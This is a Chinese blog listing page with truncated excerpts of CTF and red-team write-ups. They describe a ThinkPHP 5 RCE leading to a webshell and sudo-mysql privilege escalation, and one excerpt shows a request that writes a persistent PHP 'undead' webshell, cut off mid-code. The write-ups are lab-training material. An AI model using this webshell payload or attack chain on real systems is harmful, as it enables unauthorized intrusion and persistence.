摘要:
堡垒机都不知道你打集贸redteam? 阅读全文
posted @ 2024-11-25 21:19
Yuy0ung
阅读(2)
评论(0)
推荐(0)
该文被密码保护。 阅读全文
posted @ 2024-11-25 21:18
Yuy0ung
阅读(2)
评论(0)
推荐(0)
摘要:
flag1 进入环境,发现80端口开启,看图标疑似thinkphp,指纹识别发现确实是tp5: 一把梭哈发现存在RCE: 直接写webshell连接上线: 当前权限为www-data: 尝试权限提升,信息搜集发现/usr/bin/mysql可以无密码sudo: 看看怎么打sudo提权: ok会了,直 阅读全文
posted @ 2024-11-25 21:03
Yuy0ung
阅读(161)
评论(0)
推荐(0)
摘要:
web670 这里的check貌似是删web根目录文件,那么可以用awd的常规思路,写一个不死马: GET:?action=cmd POST:cmd=file_put_contents('a.php', '<?php ignore_user_abort(true);set_time_limit(0) 阅读全文
posted @ 2024-11-25 21:00
Yuy0ung
阅读(102)
评论(0)
推荐(0)
浙公网安备 33010602011771号